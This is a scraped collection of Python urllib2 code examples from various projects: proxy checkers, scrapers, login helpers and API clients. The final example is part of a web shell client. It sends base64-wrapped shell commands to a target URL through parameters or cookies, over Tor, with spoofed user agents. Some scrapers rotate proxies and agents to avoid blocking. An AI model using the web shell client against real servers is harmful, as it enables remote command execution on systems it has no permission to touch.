Ejemplo n.º 1
0
def proxier(pip):
	try:
		testsite2 = "http://%s" % (testsite)
		proxy_handler = urllib2.ProxyHandler({'http': pip})
		opener = urllib2.build_opener(proxy_handler)
		opener.addheaders = [('User-agent', 'Mozilla/5.0')]
		urllib2.install_opener(opener)
		req=urllib2.Request(testsite2)
		sock=urllib2.urlopen(req)

		connect = httplib.HTTPConnection(testsite)
		connect.request("HEAD", "/")
		r1 = connect.getresponse()
		if r1.reason == "OK":
			print "%s works - Added to %s" % (pip, filename)

			try:
				file = open(filename, 'a')
				file.write("%s" % (pip))
				file.close()
			except IOError:
				print "Could not append to file!"

	except urllib2.HTTPError as e:
		print 'Error code: ', e.code
		return e.code
	except Exception as detail:
		print "Error: Timeout"
		return False		
Ejemplo n.º 2
0
Archivo: utils.py Proyecto: cmcc/boto
def fetch_file(uri, file=None, username=None, password=None):
    """
    Fetch a file based on the URI provided. If you do not pass in a file pointer
    a tempfile.NamedTemporaryFile, or None if the file could not be 
    retrieved is returned.
    The URI can be either an HTTP url, or "s3://bucket_name/key_name"
    """
    boto.log.info('Fetching %s' % uri)
    if file == None:
        file = tempfile.NamedTemporaryFile()
    try:
        if uri.startswith('s3://'):
            bucket_name, key_name = uri[len('s3://'):].split('/', 1)
            c = boto.connect_s3(aws_access_key_id=username, aws_secret_access_key=password)
            bucket = c.get_bucket(bucket_name)
            key = bucket.get_key(key_name)
            key.get_contents_to_file(file)
        else:
            if username and password:
                passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
                passman.add_password(None, uri, username, password)
                authhandler = urllib2.HTTPBasicAuthHandler(passman)
                opener = urllib2.build_opener(authhandler)
                urllib2.install_opener(opener)
            s = urllib2.urlopen(uri)
            file.write(s.read())
        file.seek(0)
    except:
        raise
        boto.log.exception('Problem Retrieving file: %s' % uri)
        file = None
    return file
Ejemplo n.º 3
0
    def run(self):
	try:
		cj = cookielib.LWPCookieJar()
		opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
		urllib2.install_opener(opener)

		req = urllib2.Request(self.url)
		operate = opener.open(req)
		html = operate.read()

		print r'handling ', self.urlid

		m = re.findall(r'>.*?</a></b></span>', html)

		if len(m) != 0:
			
			file_save = open(r'F://temp/3/'+self.urlid[:-1]+'.txt','a')

			file_save.write('ProductId:' + self.urlid)
			for i in m:
				j = i[1:-15].split('>')
				file_save.write(j[-1]+'\n')
			file_save.close()
		
		time.sleep(0.2)
		
	except:
		print "no"
Ejemplo n.º 4
0
def findMovieReviewers(movie_id, subUrl) :	
	print movie_id
	print subUrl
	reload(sys)
	sys.setdefaultencoding('utf-8')
	
	cj = cookielib.LWPCookieJar() 
	try: 
		cj.revert('douban.cookie') 
	except: 
		try :
			dou=douban() 
			username='******' 
			password='******' 
			domain='http://www.douban.com/' 
			origURL='http://www.douban.com/login' 
			dou.setinfo(username,password,domain,origURL) 
			dou.signin()  
		except : 
			return
	opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) 
	urllib2.install_opener(opener) 
	collectPage = urllib2.urlopen("http://movie.douban.com/subject/" + movie_id + "/reviews" + subUrl, timeout=20).read().encode('utf-8')
	soup = BeautifulSoup(collectPage, 'html.parser')

	#init db connection
	conn = MySQLdb.connect(host='localhost',user='******',passwd='root')
	curs = conn.cursor()
	conn.select_db('pydb')

	reviewsOfThisPage = soup.findAll("a", { "class" : "review-hd-avatar" })

	countReviews = len(reviewsOfThisPage)
	print countReviews

	for review in reviewsOfThisPage :
		reviewSoup = BeautifulSoup(str(review), 'html.parser')
		userId = reviewSoup.a["href"].split("/")[4]
		try :
			#insert data into db rowbyrow
			curs.execute('INSERT INTO users (user_id) VALUES (%s)', userId)
			print "rows affected " + str(curs.rowcount)
		except :
			print "error inserting, probably duplicate for userid : " + userId
			None

	try :
		foundSubUrl = soup.find("a", { "class" : "next" })['href']
	except :
		foundSubUrl = ""

	print foundSubUrl

	conn.commit()
	curs.close()
	conn.close()	

	if "" != foundSubUrl  and countReviews > 0 :
		time.sleep( 2 )
		findMovieReviewers(movie_id, foundSubUrl)
Ejemplo n.º 5
0
    def save(self):
        # TODO: new IP address should be added in a side-by-side manner
        # or the interface wouldn't appear once IP was changed.
        retval = super(GlobalConfigurationForm, self).save()

        whattoreload = "hostname"
        if self.instance._orig_gc_ipv4gateway != self.cleaned_data.get('gc_ipv4gateway'):
            whattoreload = "networkgeneral"
        if self.instance._orig_gc_ipv6gateway != self.cleaned_data.get('gc_ipv6gateway'):
            whattoreload = "networkgeneral"
        notifier().reload(whattoreload)

        http_proxy = self.cleaned_data.get('gc_httpproxy')
        if http_proxy:
            os.environ['http_proxy'] = http_proxy
            os.environ['https_proxy'] = http_proxy
        elif not http_proxy:
            if 'http_proxy' in os.environ:
                del os.environ['http_proxy']
            if 'https_proxy' in os.environ:
                del os.environ['https_proxy']

        # Reset global opener so ProxyHandler can be recalculated
        urllib2.install_opener(None)

        return retval
Ejemplo n.º 6
0
 def __init__(self, cookie_filename=None):
     self.cj = cookielib.LWPCookieJar()
     if cookie_filename is not None:
         self.cj.load(cookie_filename)
     self.cookie_processor = urllib2.HTTPCookieProcessor(self.cj)
     self.opener = urllib2.build_opener(self.cookie_processor, urllib2.HTTPHandler)
     urllib2.install_opener(self.opener)
Ejemplo n.º 7
0
def query(searchstr, outformat, allresults=False):
    """Return a list of bibtex items."""
    logging.debug("Query: %s" % searchstr)
    searchstr = "/scholar?q=" + urllib2.quote(searchstr)
    url = GOOGLE_SCHOLAR_URL + searchstr
    header = HEADERS
    header["Cookie"] = header["Cookie"] + ":CF=%d" % outformat
    for proxy_addr in proxy_list:
        try:
            proxy = urllib2.ProxyHandler({"http": proxy_addr})
            opener = urllib2.build_opener(proxy)
            urllib2.install_opener(opener)
            request = urllib2.Request(url, headers=header)
            response = urllib2.urlopen(request, timeout=5)
            print "Success HTTP-Agent:" + proxy_addr
            break
        except urllib2.URLError, e:
            if hasattr(e, "code"):
                print str(e.code) + e.msg + proxy_addr
                if e.code == 403 or e.code == 503:
                    proxy_list.remove(proxy_addr)
            elif e.reason.message == "timed out":
                print "Timed Out" + proxy_addr
                proxy_list.remove(proxy_addr)
            continue
Ejemplo n.º 8
0
def play_fourshared(url, name):
	global media_id
	xbmc.log("starting 4shared method with: %s and %s" % (name, url))
	username = '******'
	password = '******'
	cookie_file = os.path.join(__profilepath__, 'pktemp.cookies')
	media_file = os.path.join(__profilepath__, ("pktemp%d.mp3" % (media_id)))
	cj = cookielib.LWPCookieJar()
	media_id = media_id + 1

	opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
	loginurl = 'https://www.4shared.com/login?login=%s&password=%s' % (username, password)
	xbmc.log("logging in to 4shared: " + loginurl)
	resp = opener.open(loginurl)

	cj.save(cookie_file, ignore_discard=True)
	cj.load(cookie_file, ignore_discard=True)

	opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
	urllib2.install_opener(opener)

	usock = opener.open(url)
	data = usock.read()
	#media_file = usock.geturl()
	usock.close()

	fp = open(media_file, 'wb')
	fp.write(data)
	fp.close()

	#play_stream(media_file, name)
	print "playing stream name: " + str(name) + " url: " + str(media_file)
	listitem = xbmcgui.ListItem( label = str(name), iconImage = "DefaultVideo.png", thumbnailImage = xbmc.getInfoImage( "ListItem.Thumb" ), path=media_file )
	listitem.setInfo( type="Music", infoLabels={ "Title": name } )
	xbmc.Player( xbmc.PLAYER_CORE_DVDPLAYER ).play( str(media_file), listitem)
Ejemplo n.º 9
0
    def __init__(self, username, realm_id, config, debug=False):
        self._version = QAPI_VERSION
        self._cookiejar = CookieJar()
        self._username = username
        self._realm_id = realm_id
        self._profile = '@'.join((username, realm_id))
        self._realm = REALMS[self._realm_id]
        self._proxy = None
        self._templates = None
        self._debug = debug
        self._config = None #. User configuration file for scripted mode
        self._connected = False
        self._username = '******'
        self._cFM = None
        try:
            from ConfigFileManager import ConfigFileManager, InternalConfigError
            try:
                self._config = ConfigFileManager(config)
                self._qapi_ini = self._config.option('qapi', 'ini')
                self._cFM = ConfigFileManager(self._qapi_ini)
            except InternalConfigError as e:
                raise Exception("Sorry, %s" % e)
        except ImportError as e:
            raise Exception("Sorry, %s" % e)

        urllib2.install_opener(self._opener())
Ejemplo n.º 10
0
 def check_proxy(self, specific={}):
     """ Checks if proxy settings are set on the OS
     Returns:
     -- 1 when direct connection works fine
     -- 2 when direct connection fails and any proxy is set in the OS
     -- 3 and settings when direct connection fails but a proxy is set
     see: https://docs.python.org/2/library/urllib.html#urllib.getproxies
     """
     os_proxies = getproxies()
     if len(os_proxies) == 0 and self.check_internet_connection:
         logging.info("No proxy needed nor set. Direct connection works.")
         return 1
     elif len(os_proxies) == 0 and not self.check_internet_connection:
         logging.error("Proxy not set in the OS. Needs to be specified")
         return 2
     else:
         #
         env['http_proxy'] = os_proxies.get("http")
         env['https_proxy'] = os_proxies.get("https")
         #
         proxy = ProxyHandler({
                              'http': os_proxies.get("http"),
                              'https': os_proxies.get("https")
                              })
         opener = build_opener(proxy)
         install_opener(opener)
         urlopen('http://www.google.com')
         return 3, os_proxies
    def openurl(self,url):
        """
        打开网页
        """
        cookie_support= urllib2.HTTPCookieProcessor(cookielib.CookieJar())
        self.opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)
        urllib2.install_opener(self.opener)
        user_agents = [
                    'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11',
                    'Opera/9.25 (Windows NT 5.1; U; en)',
                    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
                    'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
                    'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',
                    'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.2.9',
                    "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.7 (KHTML, like Gecko) Ubuntu/11.04 Chromium/16.0.912.77 Chrome/16.0.912.77 Safari/535.7",
                    "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0 ",

                    ]

        agent = random.choice(user_agents)
        self.opener.addheaders = [("User-agent",agent),
                                  ("Accept","*/*"),
                                  ('Referer', 'http://www.google.com')
        ]
        try:
            res = self.opener.open(url)
            return res.read()
        except:
            return None
Ejemplo n.º 12
0
def Weibo(USERID, PASSWD):
    client = APIClient(app_key=APP_KEY, app_secret=APP_SECRET, redirect_uri=CALLBACK_URL)
    referer_url = client.get_authorize_url()
    #print "referer url is : %s" % referer_url

    cookies = urllib2.HTTPCookieProcessor()
    opener = urllib2.build_opener(cookies)
    urllib2.install_opener(opener)
 
    postdata = {"client_id": APP_KEY,
                "redirect_uri": CALLBACK_URL,
                "userId": USERID,
                "passwd": PASSWD,
                "isLoginSina": "0",
                "action": "submit",
                "response_type": "code",
             }
 
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0",
               "Host": "api.weibo.com",
               "Referer": referer_url
             }
 
    req  = urllib2.Request(url = AUTH_URL,
                           data = urllib.urlencode(postdata),
                           headers = headers
                    )
    try:
        resp = urllib2.urlopen(req)
        #print "callback url is : %s" % resp.geturl()
        code = resp.geturl()[-32:]
    except APIError, e:
        print e
Ejemplo n.º 13
0
    def _login(self):
        """
        Authenticates a user in a bugzilla tracker
        """
        if not (self.backend_user and self.backend_password):
            printdbg("No account data provided. Not logged in bugzilla")
            return

        import cookielib

        cookie_j = cookielib.CookieJar()
        cookie_h = urllib2.HTTPCookieProcessor(cookie_j)

        url = self._get_login_url(self.url)
        values = {'Bugzilla_login': self.backend_user,
                  'Bugzilla_password': self.backend_password}

        opener = urllib2.build_opener(cookie_h)
        urllib2.install_opener(opener)
        data = urllib.urlencode(values)
        request = urllib2.Request(url, data)
        urllib2.urlopen(request)
        for i, c in enumerate(cookie_j):
            self.cookies[c.name] = c.value

        printout("Logged in bugzilla as %s" % self.backend_user)
        printdbg("Bugzilla session cookies: %s" % self.cookies)
Ejemplo n.º 14
0
	def getResponseMixedData(self, url, secureToken, dic, additionalOptions=None):
		"Method sets up a REST call with mixed body data such as multipart/form-data."
		
		# check whether proxy is given
		if "proxy" in globals():
			proxy_handler = urllib2.ProxyHandler(self.config.proxy)
			opener = urllib2.build_opener(proxy_handler)
			urllib2.install_opener(opener)
				
		multipart = urllib2.build_opener(MultipartPostHandler.MultipartPostHandler)
		urllib2.install_opener(multipart)
		
		req = urllib2.Request(url, dic.parameters())

		req.add_header('Authorization', self.config.SDK_AUTH+",oauth_token=\""+secureToken+"\"")
		req.add_header('User-Agent', self.config.SDK_VERSION)
		req.add_header('Accept', 'application/json')
		
		# sets additional header fields
		if additionalOptions != None:
			for key in additionalOptions:
				req.add_header(key, additionalOptions[key])
		
		try:
			response = urllib2.urlopen(req)
			
			response = json.loads(response.read())	
			
			return response
		
		except urllib2.HTTPError as e:
			
			raise TelekomException(json.loads(e.read()))
Ejemplo n.º 15
0
	def getResponseJSONData(self, url, secureToken, jsonString, additionalOptions=None):
		"Method sends a JSON encoded string via REST"
		
		if "proxy" in globals(): # set proxy if necessary
			proxy_handler = urllib2.ProxyHandler(self.config.proxy)
			opener = urllib2.build_opener(proxy_handler)
			urllib2.install_opener(opener)
		
		req = urllib2.Request(url, jsonString)
			
		# define header fields	
		req.add_header('Authorization', self.config.SDK_AUTH+",oauth_token=\""+secureToken+"\"")
		req.add_header('User-Agent', self.config.SDK_VERSION)
		req.add_header('Accept', 'application/json')
		req.add_header('Content-Type', 'application/json')
		#req.add_header('Content-Length', len(json))
		
		# establish call
		try:
			response = urllib2.urlopen(req)
			response = json.loads(response.read())
			
			return response
		
		except urllib2.HTTPError as e: # catch other status codes than '0000' and raise a new TelekomException containing 'statusCode' and 'statusMessage'
			
			raise TelekomException(json.loads(e.read()))
Ejemplo n.º 16
0
    def setCookie(self, account = ''):
        self.cookieJarInMemory = cookielib.LWPCookieJar()
        if account == '':
            Var = self.cursor.execute("select cookieStr, recordDate from LoginRecord order by recordDate desc").fetchone()
        else:
            Var = self.cursor.execute("select cookieStr, recordDate from LoginRecord order by recordDate desc where account = `{}`".format(account)).fetchone()

        cookieStr = Var[0]
        self.loadCookJar(cookieStr)
        
        cookieStr = ''
        for cookie in self.cookieJarInMemory:
            cookieStr += cookie.name + '=' + cookie.value + ';'
        self.extraHeader = {
                'User-Agent':    'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:34.0) Gecko/20100101 Firefox/34.0',
                'Referer':    'www.zhihu.com/',
                'Host':   'www.zhihu.com',
                'DNT':    '1',
                'Connection': 'keep-alive',
                'Cache-Control':  'max-age=0',
                'Accept-Language':    'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3',
                # 'Accept-Encoding':    'gzip, deflate', 貌似没用
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookieJarInMemory))
        urllib2.install_opener(self.opener)
        return 
Ejemplo n.º 17
0
 def run(self):
     global proxyLists
     global proxyCheckedLists
     while proxyLists:
         proxyLock.acquire()  #获取锁
         proxyList = proxyLists.pop() #推出一个代理ip信息
         proxyLock.release()
         
         cookie = urllib2.HTTPCookieProcessor()  #使用cookie
         proxyHandle = urllib2.ProxyHandler({"http" : r"http://%s:%s" % (proxyList[0], proxyList[1])})
         opener = urllib2.build_opener(cookie, proxyHandle)
         opener.addheaders = [("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.102 Safari/537.36")]
         urllib2.install_opener(opener)
         t1 = time.time()
         try:
             req = urllib2.urlopen(self.test_url, timeout=self.timeout)
             result = req.read()
             pos = result.find(self.test_str)
             timeused = time.time() - t1
             proxyList.append(timeused)
             if pos > 1:
                 proxyLock.acquire()
                 proxyCheckedLists.append(proxyList)
                 proxyLock.release() 
         except Exception,e:
             continue
Ejemplo n.º 18
0
    def __init__(self, ticker_list, proxy=None):

        if proxy:
            
            proxy_support = urllib2.ProxyHandler(proxy)
            opener = urllib2.build_opener(proxy_support)
            urllib2.install_opener(opener)
        
        tickers = '%22%2C%22'.join(ticker_list).upper()
        
        url = 'http://query.yahooapis.com/v1/public/yql?q=select%20*%20from%20yahoo.finance.quotes%20where%20symbol%20in%20(%22'+tickers+'%22)&format=json&env=store%3A%2F%2Fdatatables.org%2Falltableswithkeys&callback='
        req = urllib2.Request(url)

        try:
            response = urllib2.urlopen(req)
            
        except urllib2.URLError, e:

            if hasattr(e, 'reason'):
                print 'We failed to reach a server with reason:', e.reason
                print 'The URL passed was:', url
                print 'The tickers passed were:', tickers
                print 'The response from Yahoo was:', e.read()
                print
            elif hasattr(e, 'code'):
                print 'The server couldn\'t fulfill the request with error code:', e.code
                print 'The URL passed was:', url
                print 'The tickers passed were:', tickers
                print 'The response from Yahoo was:', e.read()
                print
Ejemplo n.º 19
0
 def __init__(self):
     self.cj = cookielib.CookieJar()
     self.handlers = [poster.streaminghttp.StreamingHTTPHandler(),
                      poster.streaminghttp.StreamingHTTPRedirectHandler(),
                      urllib2.HTTPCookieProcessor(self.cj)]
     self.opener = urllib2.build_opener(*self.handlers)
     urllib2.install_opener(self.opener)
Ejemplo n.º 20
0
    def urlcontent(self, url, para=None, header={}):
        """
        获取地址的源代码
        url 要获取的网址
        header 头部设置
            """
        print "start get url:%s" % url
        if self.auto_sleep:
            sleep_time = random.random()*2
            time.sleep(sleep_time)

        #设置代理 只设置http和https代理
        if self.proxy:
            opener = urllib2.build_opener(urllib2.ProxyHandler({'http': self.proxy, 'https' : self.proxy}) )
            urllib2.install_opener(opener)
        #设置post参数
        params = None
        if para:
            params = urllib.urlencode(para)
        #创建请求
        request = urllib2.Request(url, params, header)
        try:
            #发送请求
            response = urllib2.urlopen(request)
            content = response.read()
            #设置了编码
            if self.charset:
                content = content.encode(self.charset)
            return content
        except:
            print 'get url content failed:', url
            return None
Ejemplo n.º 21
0
def loginWillowTV(url):
        try:
                print url
                opener = urllib2.build_opener(cookiejar)
                urllib2.install_opener(opener)
                email = wtv.getSetting('email')
                pwd = wtv.getSetting('password')
                values = {'Email': email,'Password': pwd, 'KeepSigned': 'true', 'LoginFormSubmit': 'true'}
                headers = { 'User-Agent' : 'Mozilla/5.0 (iPad; CPU OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3' }
                data = urllib.urlencode(values)
                req = urllib2.Request(url, data, headers)
                response = urllib2.urlopen(req)
                link=response.read()
                response.close()
                web = ''.join(link.splitlines()).replace('\t','').replace('\'','"')
                match=re.compile('Your email or password is incorrect').findall(web)
                if(len(match)>0):
                        d = xbmcgui.Dialog()
                        d.ok('Login Failed', 'Error: Your email or password is incorrect.','Please verify your login details.')
                        return False
                else:
                        loginSuccess =  True
                        return True
        except:
                d = xbmcgui.Dialog()
                d.ok('LOGIN Failed', 'Its not your fault. BREAK TIME!','Please go out of Willow TV and try again.')
                return False
Ejemplo n.º 22
0
def fx_opener(request):
    request.addfinalizer(
        functools.partial(setattr, urllib2, '_opener', urllib2._opener)
    )
    opener = urllib2.build_opener(TestHTTPHandler)
    urllib2.install_opener(opener)
    return opener
Ejemplo n.º 23
0
    def _opener(self):

        build = [urllib2.HTTPHandler()]

        if self.request.redirect:
            build.append(urllib2.HTTPRedirectHandler())

        if self.request.proxy_host and self.request.proxy_port:
            build.append(urllib2.ProxyHandler(
                {self.request.proxy_protocol: self.request.proxy_host + ':' + str(self.request.proxy_port)}))

            if self.request.proxy_username:
                proxy_auth_handler = urllib2.ProxyBasicAuthHandler()
                proxy_auth_handler.add_password('realm', 'uri', self.request.proxy_username,
                                                self.request.proxy_password)
                build.append(proxy_auth_handler)

        if self.request.cookies:
            self.request.cookies = os.path.join(self._dirname, self.request.cookies)
            self.cookies = cookielib.MozillaCookieJar()
            if os.path.isfile(self.request.cookies):
                self.cookies.load(self.request.cookies)
            build.append(urllib2.HTTPCookieProcessor(self.cookies))

        urllib2.install_opener(urllib2.build_opener(*build))
Ejemplo n.º 24
0
def fetch_data_from_url(url):
  """Downloads and returns data from a url"""
  request = urllib2.Request(url)
  opener = urllib2.build_opener()
  urllib2.install_opener(opener)
  data = opener.open(request).read()
  return data
Ejemplo n.º 25
0
    def _connect(self, request):
        """ Connect to the secured database by opening the request.

        Required:
        urllib2.Request     request     The URL Request.

        Return:
        str                 serialized_response     response data

        """
        # create a password manager
        password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()

        # Add the username and password.
        # If we knew the realm, we could use it instead of None.
        password_mgr.add_password(
                None,
                self.base_url(),
                self._username,
                self._password)

        handler = urllib2.HTTPBasicAuthHandler(password_mgr)

        # create "opener" (OpenerDirector instance)
        opener = urllib2.build_opener(handler)

        # Install the opener.
        # Now all calls to urllib2.urlopen use our opener.
        urllib2.install_opener(opener)

        serialized_response = urllib2.urlopen(request).read()

        return serialized_response
Ejemplo n.º 26
0
def login_website():
    '''51cto'''
    proxy_support = urllib2.ProxyHandler({'http':'127.0.0.1:8086'})

    cook_jar=cookielib.CookieJar()
    cookie_support=urllib2.HTTPCookieProcessor(cook_jar)
    opener=urllib2.build_opener(proxy_support,cookie_support,urllib2.HTTPHandler)
    urllib2.install_opener(opener)
    print 'logging'
    login_url='http://home.51cto.com/index.php?s=/Index/doLogin'
    user_agents = ['Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1',]
    post_data=urllib.urlencode({'email':'*****@*****.**',
                               'passwd':'123456a',
                               'autologin':'******',
                               'reback':'http%3A%2F%2Fwww.51cto.com%2F',
                               'button.x':36,
                               'button.y':17,
                               })
    headers={
            'User-Agent':user_agents[0],
            'Referer':'http://home.51cto.com/index.php?s=/Index/index/reback/http%253A%252F%252Fwww.51cto.com%252F/'
            }
    req=urllib2.Request(url=login_url,data=post_data,headers=headers)
    res = urllib2.urlopen(req)
    print 'code is :'+str(res.code)
    if res.code<=200:
        print 'login success' 
    else:
        print 'login fail'
    print cook_jar._cookies
    
    login_after_action(res)
    
    return res
Ejemplo n.º 27
0
def login_website():
    '''csdn'''
    cook_jar=cookielib.CookieJar()
    cookie_support=urllib2.HTTPCookieProcessor(cook_jar)
    opener=urllib2.build_opener(cookie_support,urllib2.HTTPHandler)
    urllib2.install_opener(opener)
    print 'logging'
    
    login_url='http://passport.csdn.net/ajax/accounthandler.ashx?t=log&u=dylinshi&p=123456a&remember=0&f=http%3A%2F%2Fblog.csdn.net%2F&rand=0.363029723724382'
    user_agents = [
            'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6',
            'Opera/9.25 (Windows NT 5.1; U; en)',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
            'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
            'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',
            'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.2.9'
            ]
    headers={
            'User-Agent':user_agents[0],
            'Referer':settings.S_start_urls[0]
            }
    req=urllib2.Request(url=login_url,headers=headers)
    res = urllib2.urlopen(req)
    
    print 'code is :'+str(res.code)
    if res.code<=200:
        print 'login %s success'%settings.S_target_website
    else:
        print 'login %s fail'%settings.S_target_website
        print cook_jar._cookies
    return res
Ejemplo n.º 28
0
 def __init__(self, login, password, hostname, port=8091):
     self.passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
     self.passman.add_password(None, "http://%s:%d/" % (hostname, int(port)), login, password)
     self.hostname = hostname
     self.port = port
     self.opener = urllib2.build_opener(urllib2.HTTPBasicAuthHandler(self.passman))
     urllib2.install_opener(self.opener)
Ejemplo n.º 29
0
    def get_current_sequence(self):
        """get the current sequence from the paylist"""
        url = self.get_sequence_url()
        header = self.get_header()

        req = urllib2.Request(url, None, header)
        opener = urllib2.build_opener()
        opener.add_handler(urllib2.HTTPCookieProcessor(self.get_cookie()))
        try:
            opener.add_handler(self.get_proxy())
        except:
            log.warning('can not add proxy')

        urllib2.install_opener(opener)

        try:
            response = urllib2.urlopen(req, timeout=10)
            stream = response.read()
        except:
            return 0

        try:
            for line in stream.split('\n'):
                if line.startswith('#EXT-X-MEDIA-SEQUENCE'):
                    return line.split(':')[1]
        except:
            return 0
Ejemplo n.º 30
0
 def __init__(self, url, close=True, proxy=None, post=None, mobile=False, referer=None, cookie=None, output='', timeout='10'):
     if not proxy is None:
         proxy_handler = urllib2.ProxyHandler({'http':'%s' % (proxy)})
         opener = urllib2.build_opener(proxy_handler, urllib2.HTTPHandler)
         opener = urllib2.install_opener(opener)
     if output == 'cookie' or not close == True:
         import cookielib
         cookie_handler = urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())
         opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
         opener = urllib2.install_opener(opener)
     if not post is None:
         request = urllib2.Request(url, post)
     else:
         request = urllib2.Request(url,None)
     if mobile == True:
         request.add_header('User-Agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7')
     else:
         request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0')
     if not referer is None:
         request.add_header('Referer', referer)
     if not cookie is None:
         request.add_header('cookie', cookie)
     response = urllib2.urlopen(request, timeout=int(timeout))
     if output == 'cookie':
         result = str(response.headers.get('Set-Cookie'))
     elif output == 'geturl':
         result = response.geturl()
     else:
         result = response.read()
     if close == True:
         response.close()
     self.result = result
Ejemplo n.º 31
0
    def get_page_source(self, cmd):
        self.cmd = cmd
        if self.shouldIuseB64:
            self.cmd = "echo %s | base64 -d | sh" % self.cmd.encode(
                'base64').replace('\n', '')
        result = re.search(';sudo ', self.cmd)
        if result:
            command = self.cmd.replace(
                'sudo', '{0}sudo{1}'.format('\033[91m', '\033[93m'))
            errmsg = colored(
                '\n[!] Warning this command ({0}) could break the connection. I\'m not going to allow it to be sent'
                .format(command), 'red')
            cprint(errmsg, 'red')

        elif getargs.url:
            try:
                _create_unverified_https_context = ssl._create_unverified_context
            except AttributeError:
                # Legacy Python that doesn't verify HTTPS certificates by default
                pass
            else:
                # Handle target environment that doesn't support HTTPS verification
                ssl._create_default_https_context = _create_unverified_https_context

            # Proxy support
            proxy_support = ProxyHandler(
                {'http': self.proxy} if self.proxy else {})
            opener = build_opener(proxy_support, HTTPHandler(debuglevel=0))
            opener.addheaders = [
                ('Accept', '*/*'),
            ]
            if getargs.headers:
                # print opener.addheaders
                # print getargs.headers
                opener.addheaders.extend(getargs.headers)
            # Tor support
            if self.tor:
                opener = build_opener(
                    SocksiPyHandler(PROXY_TYPE_SOCKS5, '127.0.0.1', 9050))
                # print opener.open('http://ifconfig.me/ip').read()
                # exit()

            # User angent
            if getargs.random_agent:
                opener.addheaders.extend([('User-agent', self.random_agent)])
            elif self.user_agent:
                opener.addheaders.extend([('User-agent', self.user_agent)])
            else:
                pass

            install_opener(opener)

            errmsg = colored(
                '\n[!] Check your network connection and/or the proxy (if you\'re using one)',
                'red')

            # Check if the method is POST
            if self.method == 'post' or (self.parameter
                                         and self.method != 'cookie'):
                self.method = 'post'
                parameters = urlencode({
                    self.parameter:
                    'echo ::command_start::;' + self.cmd.strip(';') +
                    ';echo ::command_end::;'
                })
                try:
                    sc = map(str.rstrip,
                             opener.open(self.url, parameters).readlines())
                    sc = '::command_deli::'.join(sc)
                    sc = re.search('::command_start::(.*?)::command_end::', sc)
                    if sc:
                        sc = sc.group(1).split('::command_deli::')[1:-1]
                    else:
                        parameters = urlencode(
                            {self.parameter: self.cmd.strip(';')})
                        sc = map(str.rstrip,
                                 opener.open(self.url, parameters).readlines())
                    return sc
                except InvalidURL:
                    exit(errmsg)


#                except:
#                    exit(fourzerofourmsg)

# If the used method set GET
            else:
                try:
                    if self.method == 'cookie':
                        opener.addheaders += [
                            ('Cookie', '{0}={1}'.format(
                                self.parameter,
                                quote('echo ::command_start::;' +
                                      self.cmd.rstrip().strip(';') +
                                      ';echo ::command_end::;'))),
                        ]
                        sc = map(str.rstrip, opener.open(self.url).readlines())
                    else:
                        sc = map(
                            str.rstrip,
                            opener.open('{0}{1}'.format(
                                self.url,
                                quote('echo ::command_start::;' +
                                      self.cmd.strip(';') +
                                      ';echo ::command_end::;'))).readlines())
                    sc = '::command_deli::'.join(sc)
                    sc = re.search('::command_start::(.*?)::command_end::', sc)
                    if sc:
                        sc = sc.group(1).split('::command_deli::')[1:-1]
                    else:
                        sc = map(
                            str.rstrip,
                            opener.open('{0}{1}'.format(
                                self.url,
                                quote(self.cmd.strip(';')))).readlines())

                    return sc
                except InvalidURL:
                    exit(errmsg)
                except HTTPError:
                    cprint(
                        '[!] This is a 414 error code and you need to work with a POST method',
                        'red')
                    exit()

        elif getargs.listen:
            try:
                if (listen.socket.sendall(cmd + "\n") != None):
                    errmsg = colored('\n[!] Error in sending data (#1)', 'red')
